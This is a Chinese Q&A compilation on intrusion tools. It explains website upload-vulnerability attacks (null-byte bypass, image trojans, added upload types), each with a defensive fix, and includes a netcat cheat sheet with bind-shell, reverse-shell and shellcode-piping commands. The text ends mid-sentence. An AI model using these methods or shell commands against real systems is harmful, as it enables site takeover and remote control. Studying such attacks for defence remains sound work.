本文目录一览:
入侵指定IP需要什么工具
工具很多,方便也很多,如果你有这么厉害,什么工作也可以不用,只用系统自带的一些就可以了,
一般来说,扫描漏洞,相关的入侵工具,如1433,就用sql入侵 最后要控制种下鸽子
网站如何防范“上传漏洞”入侵
上传漏洞入侵是目前对网站最广泛的入侵方法。90%的具有上传页面的网站,都存在上传漏洞。本文将介绍常见的上传漏洞及其防范技巧。
一、能直接上传asp文件的漏洞
如果网站有上传页面,就要警惕直接上传asp文件漏洞。例如去年流行的动网5.0/6.0论坛,就有个upfile.asp上传页面,该页面对上传文件扩展名过滤不严,导致黑客能直接上传asp文件,因此黑客只要打开upfile.asp页,直接上传,asp木马即可拿到webshell、拥有网站的管理员控制权。
除此之外,目前已发现的上传漏洞
,还有动感购物商城、动力上传漏洞、乔客上传漏洞等,只要运行明小子Domain3.5,点击综合上传,即可看到这些著名的上传漏洞。
像明小子这样的上传漏洞利用工具如今还有很多,例如上传漏洞程序4in1、动易2005上传漏洞利用工具、雷池新闻系统上传漏洞利用工具、MSSQL上传漏洞利用工具等等,使用此类工具,只需填写上传页面网址和Cookies,即可成功入侵网站。
【防范方法】:为了防范此类漏洞,建议网站采用最新版(例如动网7.1以上版本)程序建站,因为最新版程序一般都没有直接上传漏洞,当然删除有漏洞的上传页面,将会最安全,这样黑客再也不可能利用上传漏洞入侵了!
如果不能删除上传页面,为了防范入侵,建议在上传程序中添加安全代码,禁止上传asp\asa\js\exe\com等类文件,这需要管理者能看懂asp程序。
二、00上传漏洞
目前网上流行的所有无组件上传类都存在此类漏洞即黑客利用抓包嗅探、ULTRAEDIT和网络军刀等工具伪造IP包,突破服务器端对上传文件名、路径的判断,巧妙上传ASP、ASA、CGI、CDX、CER、ASPX类型的木马。
例如黑客上传了一个木马文件(xiaomm.asp空格.jpg),由于上传程序不能正确判断含有十六进制00的文件名或路径,于是就出现了漏洞,当上传程序接收到xiaomm.asp空格.jpg文件名数据时,一旦发现xiaomm.asp后面还有空格(十六进制的00),它就不会再读下去,于是上传的文件在服务器上就会被保存成xiaomm.asp,因此上传木马就成功了!
【防范方法】:最安全的防范办法就是删除上传页面。
三、图片木马上传漏洞
有的网站(例如动网7.1SP1博客功能),其后台管理中可以恢复/备份数据库,这会被黑客用来进行图片木马入侵。
图片木马入侵过程如下:首先将本地木马(例如F:\labxw\xiaomm.asp)扩展名改为.gif,然后打开上传页面,上传这个木马(例如F:\labxw\xiaomm.gif);再通过注入法拿到后台管理员的账号密码,溜进网站后台管理中,使用备份数据库功能将.gif木马备份成.asp木马(例如xiaomm.asp),即在备份数据库路径(相对)输入刚才图片上传后得到的路径,在目标数据库路径输入:xiaomm.asp,提示恢复数据库成功;现在打开IE,输入刚才恢复数据库的asp路径,木马就能运行了。
【防范方法】:删除后台管理中的恢复/备份数据库功能。
四、添加上传类型漏洞如今大多数论坛后台中都允许添加上传类型,这也是个不小的漏洞!只要黑客用注入法拿到后台管理员账号密码,然后进入后台添加上传类型,在上传页面中就能直接上传木马!
例如bbsxp后台中允许添加asa|asP类型,通过添加操作后,就可以上传这两类文件了;ewebeditor后台也能添加asa类型,添加完毕即可直接上传asa后缀的木马;而LeadBbs3.14后台也允许在上传类型中增加asp类型,不过添加时asp后面必须有个空格,然后在前台即可上传ASP木马(在木马文件扩展名.asp后面也要加个空格)。
【防范方法】:删除后台管理中的添加上传类型功能。
五、通用防范上传漏洞入侵秘笈:将服务器端的组件改名
众所周知,ASP木马主要是通过三种组件FileSystemObject、WScript.Shell和Shell.Application来操作的,因此只要你在服务器上修改注册表,将这三种组件改名,即可禁止木马运行、防范黑客入侵了。这一招能防范所有类型的上传漏洞,因为即使黑客将木马成功上传到服务器中,但是由于组件已经被改名,木马程序也是无法正常运行的!
具体而言,需要将FileSystemObject组件、WScript.Shell组件、Shell.Application组件改名,然后禁用Cmd.exe,就可以预防漏洞上传攻击。
网络军刀是什么东西?
网络军刀是一款正在开发测试中的网络安全工具集,开发环境为Windows 2000,目前主要包含以下模块:1、图形界面的netcat:NetCat的作用不必多说了,该模块基于图形界面操作,方便使用。同时,本模块提供内置的Base64编/解码支持,可以对全窗口或者选定文本进行中英文Base64操作,方便您直接收发电子邮件或者处理任何需要Base64编/解码的验证环境。打开站点语法为:open website:port(port缺席为80);clear为清屏。更多其它命令请参阅相关端口服务的RFC定义。2、ICMP侦测工具:Ping、Trace图形化工具3、端口侦听:如果您的电脑挂在网上,您知道有多少人曾经扫描过您的电脑?您又知道有多少人曾经企图对您的电脑进行一些什么样的黑客操作吗?或者,您想取证任何入侵企图吗?我想如果您没有合适的软件,您是不会知道这些的,试试这个模块,看看都有些谁具有什么不良企图。同时,本模块虚拟支持主要的WEB/SMTP/POP3/FTP等服务,你可以启用Outlook或者FTP对这些端口进行操作并且都能成功(这一切都是为了更完整的取证)。当然,这个模块最适合于相关RFC分析和学习。4、系统窗口监视器:您想知道Windows操作系统究竟在后台隐藏打开了多少软件窗口吗?这些窗口有没有可疑的呢?试试这个模块,您可以通过鼠标右键自由控制各个窗口的隐藏显示方式或者关闭,您会从中发现很多鲜为人知的系统秘密。您甚至还可以浏览并操作这些窗口的菜单,禁止或者开放某些窗口功能。
谁知道'中华经典网络军刀'怎么使用!!!
NC.EXE 常被用作黑客工具。主要用法如下
1)连接到REMOTE主机,例子: 格式:nc -nvv 192.168.x.x 80 讲解:连到192.168.x.x的TCP80端口
2)监听LOCAL主机,例子: 格式:nc -l -p 80 讲解:监听本机的TCP80端口
3)扫描远程主机,例子: 格式:nc -nvv -w2 -z 192.168.x.x 80-445 讲解:扫描192.168.x.x的TCP80到TCP445的所有端口
4)REMOTE主机绑定SHELL,例子: 格式:nc -l -p 5354 -t -e c:\winnt\system32\cmd.exe 讲解:绑定REMOTE主机的CMDSHELL在REMOTE主机的TCP5354端口
5)REMOTE主机绑定SHELL并反向连接,例子: 格式:nc -t -e c:\winnt\system32\cmd.exe 192.168.x.x 5354 讲解:绑定REMOTE主机的CMDSHELL并反向连接到192.168.x.x的TCP5354端口 以上为最基本的几种用法(其实NC的用法还有很多, 当配合管道命令"|"与重定向命令""、""等等命令功能更强大......)。
高级用法:
6)作攻击程序用,例子: 格式1:type.exe c:\exploit.txt|nc -nvv 192.168.x.x 80 格式2:nc-nvv192.168.x.x80讲解:连接到192.168.x.x的80端口,并在其管道中发送'c:\ex ploit.txt'的内容(两种格式确有相同的效果, 真是有异曲同工之妙:P) 附:'c:\exploit.txt'为shellcode等
7)作蜜罐用[1],例子: 格式:nc -L -p 80 讲解:使用'-L'(注意L是大写)可以不停地监听某一个端口,直到ctrl c为止
8)作蜜罐用[2],例子: 格式:nc -L -p 80c:\log.txt 讲解:使用'-L'可以不停地监听某一个端口,直到ctrl c为止,同时把结果输出到'c:\log.txt'中,如果把'